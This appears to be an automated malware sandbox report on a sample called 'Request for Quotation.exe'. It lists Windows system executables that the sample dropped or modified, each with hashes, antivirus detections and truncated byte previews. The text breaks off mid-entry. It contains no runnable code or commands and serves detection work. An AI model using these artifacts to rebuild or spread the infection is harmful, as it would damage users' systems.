                                      Preview:...IH7JE2KRB.2A.H2YDZC8sHPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CP.IK7DZ.ER.8...I..x.2*K.8"*Q117i(V$+Y?r Ty@4&h[7d..k.%?!Sm]WCo7JE6KRBHX;.u(U.y:$..(7.,...s+P._..~Q>.[...e$=.jZ+8xV$.ZIK7JE6K..1Y~@IH./..C83HPE6C.ZKJ<KN6K.F1Y2AHH2YD.W83H@E6C ^IK7.E6[RB1[2ANH2YDZC85HPE6CPZI;3JE4KRB1Y2CH..YDJC8#HPE6SPZYK7JE6KBB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83H~1S;$ZIKC.A6KBB1YjEHH"YDZC83HPE6CPZIk7J%6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y

                                      C:\Users\user\AppData\Roaming\398ce0ec3b45a4be.bin

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:OpenPGP Public Key
                                      Category:dropped
                                      Size (bytes):12320
                                      Entropy (8bit):7.986551112683112
                                      Encrypted:false
                                      SSDEEP:192:uX2rIUcyCzR05PwTKAax6ah0PZKp6Hl0PZWKBi6jHJhJNkxzifaFZw1xdBZdLKqc:S2rECYe3x6C0bHUWjqhJ2OfaT2dhd5G
                                      MD5:E1F19CDFFCDDB9BF326B3C7C6054648A
                                      SHA1:4E775967EEABFEE4DF8CEA7239DD0E84F22323C3
                                      SHA-256:218262C39AECCCC48784EEF71C0D9A70F8B73CFE8EA6EB17ED543D79F63327DA
                                      SHA-512:5D21C86A24ADED75CB9B5500681EE35DFCCE62754224B44AD9EA61D4E7D31B66B1A5F230A99E00443F168D32897E30B48B97986542CE28C4CC81DE26B742E91C
                                      Malicious:false
                                      Preview:....6d7.1..#....t.(C`...v.(!..k..Bz.@...=...b/...H....2........../j]...e.ji6.=xW1...y..YLw.te.S...z..XQ......X.hK.^.".h..T...v(E..f..+.....7I.U.i.*:..6........../..#'2.Y...f...j8.G.....>.P...x+....w.#..|..&Q,.5....]..9..l.4.b....-....F.xz.!`B...3..5e8<.[Gcs.......G^$.Ot...7.Z.....p-.....^1..#;.2.4.6...;.,:E.{..9....iu.Gk!"Z..0.yr.o....{.^..y..P.....t7.:....k1.R...i..c...'.o7k..i............cE......)..R..qxc.'..V.<..6........`q....:E..K.......>......@.Bv.L......U....)..H..wl.4. :7.......~...L...H....]. 9.._......@1.......].......*..{.,.P..5..)l.sDyVc..0.F.Z....o....E.]s...fCn....,..K.-6.(k1.....i.g..r._rg.........N......V..f.9.........}.s.......!j..U.C....f..%)`}..P.$....+,..>.P5...&..!.."8.....,<..X...y9....iC..Pa......"qW...G|ce..'.U(.Wz.j.k.a..BU|.}.(o.p.8n...%.1.. >..D............Y..W,_F...~.o.....K.,.f... ._....r.........@...j.kc. ..,.j..0Rlg.....+#n~....>&~....yQ..1.....D!..Gf@....._.....X..=G..i}....P./..p.L.2. ./+J.u....Fz...>...\...Vu

                                      C:\Windows\DtcInstall.log

                                      Download File
                                      Process:C:\Windows\System32\msdtc.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):2313
                                      Entropy (8bit):5.130169487900046
                                      Encrypted:false
                                      SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786p:Z070s0Y0q0mF7Dm5i
                                      MD5:36D92D36E350CFB120A1F587B579AA9B
                                      SHA1:F8FE97006F9CF5E4D4758742842C9D539244A699
                                      SHA-256:689D3879760B60EFBF0AD53261EF5649221E19477862C1610E8FA35D4BF3084F
                                      SHA-512:E486543DA8426EBD6821153F6AD56E32F2F0870DB7740B4792346DDD62A615A3EDB497993C3CD20DCA1893B8910EA4DBE848BCB53B17FDFBD191A43400D6D662
                                      Malicious:false
                                      Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

                                      C:\Windows\SysWOW64\perfhost.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1519616
                                      Entropy (8bit):4.020701478630795
                                      Encrypted:false
                                      SSDEEP:12288:EqV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ESVg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:E14C66701387555047BA9BBD23773B82
                                      SHA1:F0BBF7F55117308569A83BDFEEC38C3A1A16BCB4
                                      SHA-256:9BAB90ECEBB3CFAF02DA27E4AD6353B3FBF5A97900D45648ACF040E3BB1B23FD
                                      SHA-512:1C3DF4E4673A50C742567084BE77E164DBA6042EF6132CCA12B083091D24692875CBBA20FAACFB4247F30EA16AFE3762972D74C4916670326FC8936839D8C417
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@..........................p......^ ........... ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...............P..............@...........................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\System32\AppVClient.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1348608
                                      Entropy (8bit):7.251564108576511
                                      Encrypted:false
                                      SSDEEP:24576:DQW4qoNUgslKNX0Ip0MgHCpoMBOuqVg9N9JMlDlfjRiVuVsWt5MJMs:DQW9BKNX0IPgiKMBOu2gFIDRRAubt5M
                                      MD5:5DD1E83A36E68A7B8F2D74514F9AFFA1
                                      SHA1:F490437DFAD377E433270ADBE52DB46ACBC3A2D7
                                      SHA-256:A05987935D0B94123C649DF69D4D7EAEF4F2A4BB232F77E20220B89CA6AE6DA3
                                      SHA-512:49B6C2017750384F1A7EF6BC659312C9CFC3404CCBBB97891C30F3774BFB3270B2DDC65CFFCF98627AD0801425EF39966E5FDC5E8D097CF215F093131BD54586
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                      C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1592832
                                      Entropy (8bit):4.174816590872804
                                      Encrypted:false
                                      SSDEEP:24576:S2G7AbHjkNVg9N9JMlDlfjRiVuVsWt5MJMs:S2G7AbHj4gFIDRRAubt5M
                                      MD5:17489634D24B10423079989B4964A3E7
                                      SHA1:D1C9C1E4F948908441E8B2E11069F527F42867F2
                                      SHA-256:069C92AEFA981274D38621427F5601B90388D428789C5FC3DDA03835BDC9B17D
                                      SHA-512:1E69700EC92B50C6157C234629D4CFDCBCB07D61D34BC585032184FDE34E61BA404057BDAD5ECA70C12BA568C42E6C623291400399D1A2F108F7673C2DFF97E5
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.....................................A.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................

                                      C:\Windows\System32\FXSSVC.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1242624
                                      Entropy (8bit):7.287678430785767
                                      Encrypted:false
                                      SSDEEP:24576:FkdpSI+K3S/GWei+qNv2wG3VVg9N9JMlDlfjRiVuVsWt5MJMs:F6SIGGWei2wG3vgFIDRRAubt5M
                                      MD5:4858CF6BC0503B39DCDAD51E994CDEF5
                                      SHA1:7A7F8F760458A43435E4F75A8389F3569FF85676
                                      SHA-256:7DA62D628717834A5ED7760FCA9184E06133F75EDC52E74A97D4CC505BB08943
                                      SHA-512:9618F7854BA9962622ADAAE72E739EA94B9B225AD81042349F12F2EB02C80D0E00D71958A5DC2411991B75A85826BE266166AC7EBEC232E368D01F1AF5737497
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......f..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                      C:\Windows\System32\Locator.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1509888
                                      Entropy (8bit):3.9969791339781
                                      Encrypted:false
                                      SSDEEP:12288:c+V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:c+Vg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:0EA212771D99ED9B59C38AC619AF79B7
                                      SHA1:FD2B9E1B37ED13C75C3D6029913015EA55A06B36
                                      SHA-256:D49C6F4BF777A1EC5508B40AB438C2E7A6D1CD864DBE5B59D1878296058FE360
                                      SHA-512:1427D57403B925B15C89F60906785AE36E16B2B1F309F916D1DD327855777F59632D610B548F926F53EEF621F398484B8E2D7E860D403628FEA272F8CD66B78D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.............................P......HL.... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc.......`.......*..............@...........................................................................................................................................................................................................................................................

                                      C:\Windows\System32\MsDtc\Trace\dtctrace.log

                                      Download File
                                      Process:C:\Windows\System32\msdtc.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):16384
                                      Entropy (8bit):0.3212443768735157
                                      Encrypted:false
                                      SSDEEP:6:gLE9Xlt8ta/k/uMclF6vMclFq5zwqkH1z8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+t:rr80kqF69Fq5zIC6CzE5Z2+fqjFnt
                                      MD5:DE5878E5757F885DB757BF3446EFA032
                                      SHA1:269F1447D74CA93905114E0B78B96AFE8739AFB7
                                      SHA-256:16D662EA0CD8F304DDE84B4A8B0927D77F95A58914F47C79481BB3497B83D493
                                      SHA-512:978772A5450B17BF3FC8A5064179C1C3A8AD9658EEA69084871EA8165E82C5B4F1D7F917F500EC6AD7B052A6015B75B277B22BBD27A8A98C973966207AE871A9
                                      Malicious:false
                                      Preview:.@..X...X.......................................X...!...........................h...P......i.............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O................K..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.h...P......i............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\System32\OpenSSH\ssh-agent.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:modified
                                      Size (bytes):1880064
                                      Entropy (8bit):4.384276645606277
                                      Encrypted:false
                                      SSDEEP:24576:AdL3UTdVg9N9JMlDlfjRiVuVsWt5MJMs:AdL3UjgFIDRRAubt5M
                                      MD5:7765865BFBC2AA0361E0E3A618C590B8
                                      SHA1:B41A5E2E9CAD137A3C771E7A2991E6FC3A5B278E
                                      SHA-256:CDEBFE96155BFB4D893ED8EEC6F33988430CB3DB9A5272320A1BA6D57D55CE2D
                                      SHA-512:09F25932083A1C1F6223E6B34BCA75DE8B4C8E42E26A3C9C2BF146E65F11224AA3B32BB6AD4EF510553275264B8E515FF55FCF98CDB74B4186C27BBB358BB4D8
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@............................. ............ ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc.......0......................@...........................................................................................................................................................................................................................

                                      C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1604608
                                      Entropy (8bit):4.198120609596529
                                      Encrypted:false
                                      SSDEEP:12288:HpFtyOzV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:wO5Vg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:65E45E0DE8536F3B14E886405F9D1C56
                                      SHA1:1B5DFFCA00D6CFD85445350149517BE467957CEB
                                      SHA-256:298FE01AD37474CC0DE60E6E03967290D684D746E9406C40C2C0221814A572D8
                                      SHA-512:E4726C7EAD567994AA53E86B554717ED5A8E237C915DA0E6D7E5768F70BE8DED79556B201E46402A4D321C1785281AB222B055FDA4EC7084C8CD2A39EE393C96
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@.....................................?.... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................

                                      C:\Windows\System32\SensorDataService.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1846784
                                      Entropy (8bit):6.937336792673284
                                      Encrypted:false
                                      SSDEEP:49152:aF2YuHNETovAvNYf8kmugFIDRRAubt5M:T6BCf8k0Uf
                                      MD5:B7946E1BA775337FEE4E6785A5E67187
                                      SHA1:7C830E1D73ABEDEFA90846D3B730AF3955693F71
                                      SHA-256:AE92B72A3FF48C51EED2FBCD6AE5FF41B5E3FE45E956B9063D054273EA0273B9
                                      SHA-512:66DF31B9D85E4FCA95729B4CCC97AAF6021793FA416CDA24B321234458567EF9E9F2274D2C83BC5D8EAC2417071639A7EADF5537122B9E5DFA0B6D90835642CF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p......4..... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

                                      C:\Windows\System32\Spectrum.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1455616
                                      Entropy (8bit):7.236396669872163
                                      Encrypted:false
                                      SSDEEP:24576:iiW6ZvAKF5i/dN9Bdexj9Trk+F5Vg9N9JMlDlfjRiVuVsWt5MJMs:iYxF50b9Bdm9TxZgFIDRRAubt5M
                                      MD5:7708CE35FBFD8CB3DA18C4C0207016DB
                                      SHA1:CF8AE3EF739F33FB945EBB2A9912B53D74013BC4
                                      SHA-256:726908E72EE701EF083E4022D8A2413FB5055174259E64B03AB7CF47FE6A4005
                                      SHA-512:49331CE63837C64418FEF79FBA0D15E8BB325D4AC5C4837213E85EC33376720A7F6881A2BF1080A50D92017634963D14D97E3CE9EEBF4764958DA1B461844FF1
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@.......................................... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

                                      C:\Windows\System32\alg.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1594368
                                      Entropy (8bit):4.175676627135614
                                      Encrypted:false
                                      SSDEEP:12288:YEP3RF8V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:zFAVg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:5814D242CD3F0A5096ACA78A36BA8FA8
                                      SHA1:B786DA5A5A22819FD65A08EF0C58412EB0972EC9
                                      SHA-256:D704E83758EF84148A78DE88FEDF1FC4F989B4D95D67ABF378DEE2E13D33D181
                                      SHA-512:DE11351414A51EC8FD20FDD3C313851F9B7FD0D359DA57CAC73C572DFC109D65EFCE1E7368F4BDACC43D125F656EA727F7060A0B64BBB1CE820C921EA4E02E28
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................?..... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

                                      C:\Windows\System32\config\systemprofile\AppData\Roaming\398ce0ec3b45a4be.bin

                                      Download File
                                      Process:C:\Windows\System32\AppVClient.exe
                                      File Type:COM executable for DOS
                                      Category:dropped
                                      Size (bytes):12320
                                      Entropy (8bit):7.986555673743732
                                      Encrypted:false
                                      SSDEEP:384:oDyvmP2WoA9SkWe4dVccV1m4PncJQVwd9BOu:oDyvgskWfVcczVnvV6nOu
                                      MD5:55AF6033F3C6DB799617B52755E7D5FF
                                      SHA1:79D83BB56DB9BC6C3338F4D7F83B446C2C68B4B6
                                      SHA-256:B55FF2D8D972B6A4BD3C181151541EB904B8510509B2568238C84DD446BAB3D1
                                      SHA-512:BA2CBB32038A48C0BD77130299AF4C07CC65B2ED05D7AD06F815FDA6E04CDC731B905694666DB0AB35719D32386C837103DD44943FE00BA6EF79F6EF5C79CAA7
                                      Malicious:true
                                      Preview:....y...-g.....~...c.)..".......>d..R....T....O.].<M....Z.z....s.Qk....BQ......<.UP....tp./j6.W.jzd.W......3...&$.R....YC..K&,z.U..P..y.Ie....^5.zl....Y>..,...d.NPt.......Jd2......+$.$\...>....4.....%w.c...!g..*#.....[N3V..n....."....l.V...Z.sa"T..\.m....^q.5H.!...."U.A....5p.*.^8.p)..k.;...-.......q..eg.t...T!.X~.v....ic.irVCL.Y..!S[.l..7G...%....e..y"e....<...nqq.....R....8.q$.#...7n<.`..]X.S9..p..9..@/...:hq.z.|...f..%n}P...J.WF..A...dW|.l..AK....3...!b....D.D..m....{9z...;h...h...`.D..8`.4..{..~P.+..c..0c...,..[.m....;./.Y..k.z.DC.z..Tn..bA..Ldb..?*hO...R..I...[P.K...)N KK.b.1...N.L..).<..:zfbm....9..8......d...0.i...4..&...2....J}V[?m.2?...K.G8...zn..>..V&.mr.`.f.s...c..V...;?.S..QR...6...@i....`..H...;u.G...7..%%R..Dqc.......V.f.../Y.:......1i.]..Oz....3..V..U.......m..>..#E..%...;..r?..Z..]>.a..*-...DL.Q]g'....y...N.;...}....: ~.4....S.I,..4........&>.s...-.C.U.r....,.....Z...Ne.i.<&.(.:.po.. ..q]~.I...@.....!.bc..D..U:..|s.t(

                                      C:\Windows\System32\msdtc.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1647104
                                      Entropy (8bit):4.190900811453706
                                      Encrypted:false
                                      SSDEEP:12288:zjkyBV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:zIy7Vg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:D8FC46BD67F795631C6DAD07E33247EE
                                      SHA1:540824F4E828DF674DDA4F0A41993672EA7428AE
                                      SHA-256:D4B14354E3093A10584B7DD88D9F1B609F47A41207D641B0C24DB509B371F487
                                      SHA-512:92E39347E13BBF067EE0B0D47A1FF5B8E15170E0F454D9DBC2691461527D96509CE8CCAE3D592B709EAAB8C3DABFEF02D9E24F76EEEA225D63683F11F1A8529D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@.......................................... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...............B..............@...................................................................................................................................................................................................................

                                      C:\Windows\System32\msiexec.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1568256
                                      Entropy (8bit):4.091828731826514
                                      Encrypted:false
                                      SSDEEP:12288:t40vV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:vdVg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:0B3697CAF4A8FF717DE185B5754790C2
                                      SHA1:28BF993B178BB5B3A33A67B7A1F4F5CC831C1465
                                      SHA-256:E2FC7B11F9583B08E31F9C40EB34F2FEBAB37D65559A8AC9B2F315056A1402D1
                                      SHA-512:6D4A1FE0A9173E55972B66EFF662EF176F0FC9E41975689DCC760FC25640DECB61A9D9A001FA5ED2B342BE4716C36DDA997B7C9A97502842BFB7B4D02AD1B811
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.............................P.......r.... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc.......`......................@...........................................................................................................................................................................................................................................

                                      C:\Windows\System32\snmptrap.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1515520
                                      Entropy (8bit):4.009203929030421
                                      Encrypted:false
                                      SSDEEP:12288:gQDV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:XpVg9N9JMlDlfjRiVuVsWt5MJMs
                                      MD5:612475391C7276C2E25FF0A0CCAD3C66
                                      SHA1:4F6C19D2F23A2618421D8525A0C55DA11F1F4A8E
                                      SHA-256:3B8F2FF241F83EC75BA5A94712DD8E903F39E65C54E06EEBE4EC39B978E9A57F
                                      SHA-512:26B6BC0E55ABFE39665199D4111516F6F0F028893502CF3529CA06F560AE120C3B0C807EBED8E25E955E92CFC2222087C810F7388243F1B7483FFB801E7A4B3F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@.............................`......:<.... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc.......p.......@..............@...........................................................................................................................................................................................................................................................................

                                      C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

                                      Download File
                                      Process:C:\Windows\System32\Spectrum.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
